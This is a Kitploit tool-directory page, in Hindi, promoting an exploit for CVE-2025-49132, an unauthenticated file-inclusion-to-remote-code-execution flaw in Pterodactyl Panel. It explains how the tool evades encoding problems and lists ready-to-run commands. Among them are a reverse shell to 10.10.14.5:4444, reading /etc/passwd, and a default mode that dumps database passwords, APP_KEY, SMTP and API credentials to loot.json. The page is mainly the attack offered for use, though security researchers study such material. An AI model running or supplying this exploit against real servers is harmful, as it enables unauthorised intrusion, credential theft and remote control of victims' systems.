Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-49132 — Pterodactyl Panel ≤ 1.11.10 के लिए एक्सप्लॉइट - बिना प्रमाणीकरण के LFI से RCE | Kitploit
उपकरण/GitHubGitHub/yoyochaud/cve-2025-49132
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubyoyochaud/cve-2025-49132

CVE-2025-49132

Pterodactyl Panel ≤ 1.11.10 के लिए एक्सप्लॉइट - बिना प्रमाणीकरण के LFI से RCE

रिपॉजिटरी देखें
25137 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-49132 - Pterodactyl पैनल बिना प्रमाणीकरण के RCE

root@kitploit:~
  ___ __   __ ___      ___   ___  ___  ___        _  _   ___  _  ____  ___ 
 / __|\ \ / /| __|___ |_  ) / _ \|_  )| __|___   | || | / _ \| ||__ / |_  )
| (__  \ V / | _|___|  / / | (_) |/ / |__ \___|  |_  _| \_, /| ||_ \  / / 
 \___|  \_/  |___|    /___| \___//___||___/        |_|   /_/ |_|___/ /___|

Pterodactyl Panel ≤ 1.11.10 के लिए एक्सप्लॉइट - बिना प्रमाणीकरण के LFI से RCE तक।

भेद्यता

/locales/locale.json एंडपॉइंट locale और namespace पैरामीटर स्वीकार करता है जो बिना सैनिटाइज़ेशन या प्रमाणीकरण के सीधे PHP के include() में पास किए जाते हैं। दुरुपयोग रोकने के लिए बनाया गया hash पैरामीटर अनपैच्ड संस्करणों पर कभी लागू नहीं होता।

यह निम्न की अनुमति देता है:

  • लोकल फ़ाइल इंक्लूज़न (LFI) - किसी भी .php कॉन्फ़िग फ़ाइल को पढ़ें (डेटाबेस क्रेडेंशियल, APP_KEY, मेल, सेशन…)
  • रिमोट कोड एक्ज़ीक्यूशन (RCE) - pearcmd.php इंक्लूज़न (register_argc_argv + config-create ट्रिक), PHP फ़िल्टर चेन, या लीक हुई APP_KEY के साथ Laravel डिसीरियलाइज़ेशन के माध्यम से

प्रभावित: Pterodactyl Panel ≤ 1.11.10 फिक्स: 1.11.11

यह PoC क्यों?

मूल PoCs पायथन requests का उपयोग करके pearcmd पेलोड भेजते हैं। समस्या: requests चुपचाप <, >, {, } जैसे वर्णों को URL-एन्कोड कर देता है - जो URL में एम्बेडेड PHP टैग्स (<?=system(...)?>) को तोड़ देता है।

यह एक्सप्लॉइट इसे दो प्रमुख बदलावों से ठीक करता है:

  1. चरण 1 के लिए curl - पेलोड निर्माण अनुरोध subprocess के माध्यम से curl -g (globoff) का उपयोग करता है, जो पायथन की URL एन्कोडिंग को पूरी तरह से बायपास करता है।
  2. कमांड एन्कोडिंग के लिए hex2bin() - रॉ कमांड को इंजेक्ट करने के बजाय (जो स्पेस और विशेष वर्णों पर टूट जाता है), कमांड को हेक्स-एन्कोड किया जाता है और सर्वर-साइड system(hex2bin('...')) से डिकोड किया जाता है। हेक्स केवल 0-9a-f का उपयोग करता है - कोई + नहीं, कोई = नहीं, कोई & नहीं, कोई स्पेस नहीं। इसका मतलब है कि कोई भी कमांड काम करता है, जिसमें >& और /dev/tcp/ वाले रिवर्स शेल भी शामिल हैं।
  3. डायनामिक PEAR पाथ - कई स्टैटिक स्क्रिप्ट्स के विपरीत जो /usr/share/php को हार्डकोड करती हैं, यह टूल --pear-dir तर्क को पूरी तरह से सपोर्ट करता है। यह रॉ curl अनुरोध में कस्टम पाथ को डायनामिक रूप से इंजेक्ट करता है, जिससे गैर-मानक कॉन्फ़िगरेशन वाले लक्ष्यों का शोषण संभव होता है।
  4. ऑल-इन-वन ऑटोमेशन - अलग-अलग वैक्टर के लिए अलग-अलग स्क्रिप्ट पर निर्भर रहने के बजाय, यह टूल पूरे हमले की सतह (pearcmd, PHP Filters, Deserialization, LFI .php) को पूरी तरह से स्वचालित करता है, सबसे विश्वसनीय RCE पथ की गारंटी के लिए हर संभावना की जाँच करता है।

इंस्टॉल

root@kitploit:~
pip install requests

वैकल्पिक (फ़िल्टर चेन / डिसीरियलाइज़ेशन RCE तरीकों के लिए):

root@kitploit:~
pip install pycryptodome
git clone https://github.com/synacktiv/php_filter_chain_generator

उपयोग

RCE

root@kitploit:~
# Simple command
python3 exploit.py http://panel.fr --rce-cmd "id"

# PHP filter chain (needs php_filter_chain_generator in PATH)
python3 exploit.py http://panel.fr --rce-filter "id"

# Pre-generated filter chain
python3 exploit.py http://panel.fr --rce-filter "id" --filter-chain "php://filter/..."

# Laravel deserialization via leaked APP_KEY (needs phpggc + pycryptodome)
python3 exploit.py http://panel.fr --rce-d "id"

# RCE with another pear directory
python3 exploit.py http://panel.fr --rce-cmd "cat /etc/passwd" --pear-dir /usr/share/php/PEAR

# Reverse shell 
python3 exploit.py http://panel.fr --rce-cmd "/bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

पूर्ण कॉन्फ़िग डंप (डिफ़ॉल्ट मोड)

root@kitploit:~
# Dumps all configs (DB creds, APP_KEY, mail, session, CORS…) + attempts auto RCE
python3 exploit.py http://panel.fr

विकल्प

OptionDescription
targetलक्ष्य URL (जैसे http://panel.pterodactyl.fr)
--rce-cmd CMDCMD को pearcmd के माध्यम से निष्पादित करें (किसी भी कमांड का समर्थन करता है, जिसमें रिवर्स शेल शामिल हैं)
--rce-filter CMDPHP फ़िल्टर चेन के माध्यम से CMD निष्पादित करें
--filter-chain CHAINपहले से जनरेट की गई php://filter चेन का उपयोग करें (--rce-filter के साथ)
--rce-d CMDLaravel डिसीरियलाइज़ेशन के माध्यम से CMD निष्पादित करें
--pear-dir PATHpearcmd.php डायरेक्टरी का पाथ (डिफ़ॉल्ट: /usr/share/php)
--timeout Nसेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 10)
--verify-sslSSL प्रमाणपत्र सत्यापन सक्षम करें (डिफ़ॉल्ट रूप से अक्षम)
-o FILEआउटपुट रिपोर्ट फ़ाइल (डिफ़ॉल्ट: loot.json)

सामान्य --pear-dir मान

DistroPath
Debian / Ubuntu/usr/share/php (डिफ़ॉल्ट)
openSUSE/usr/share/php/PEAR
Alpine/usr/share/php84 या /usr/share/php83
RHEL / Rocky/usr/share/pear

डिफ़ॉल्ट मोड क्या डंप करता है

जब --rce-cmd / --rce-filter / --rce-d के बिना चलाया जाता है, तो एक्सप्लॉइट पूर्ण कॉन्फ़िग निष्कर्षण करता है:

  • डेटाबेस - MySQL होस्ट, पोर्ट, यूज़र, पासवर्ड, डेटाबेस नाम + Redis कॉन्फ़िग
  • एप्लिकेशन - APP_KEY (→ Laravel डिसीरियलाइज़ेशन), संस्करण, एनवायरनमेंट, डीबग मोड
  • Pterodactyl - पैनल-विशिष्ट सेटिंग्स, 2FA कॉन्फ़िग, फ़ीचर फ़्लैग्स
  • सेशन - ड्राइवर, कुकी कॉन्फ़िग, एन्क्रिप्शन सेटिंग्स
  • प्रमाणीकरण - लॉकआउट कॉन्फ़िग, पासवर्ड रीसेट समाप्ति
  • सेवाएँ - बाहरी API कुंजियाँ (Mailgun, Postmark, आदि)
  • मेल - SMTP क्रेडेंशियल, मेलर कॉन्फ़िग
  • क्यू / कैश / हैशिंग / CORS / लॉगिंग / फ़ाइलसिस्टम
  • संवेदनशील फ़ाइलें - /etc/passwd, होस्टनाम, कर्नेल संस्करण पढ़ने का प्रयास

पूर्ण JSON रिपोर्ट loot.json में सहेजी जाती है (या -o के माध्यम से कस्टम पाथ)।

श्रेय

यह एक्सप्लॉइट GRodolphe/CVE-2025-49132_poc के PoC पर आधारित एक सुधार है, जो स्वयं 0xtensho/CVE-2025-49132-poc के मूल PoC से प्रेरित है।

टूल डाउनलोड करें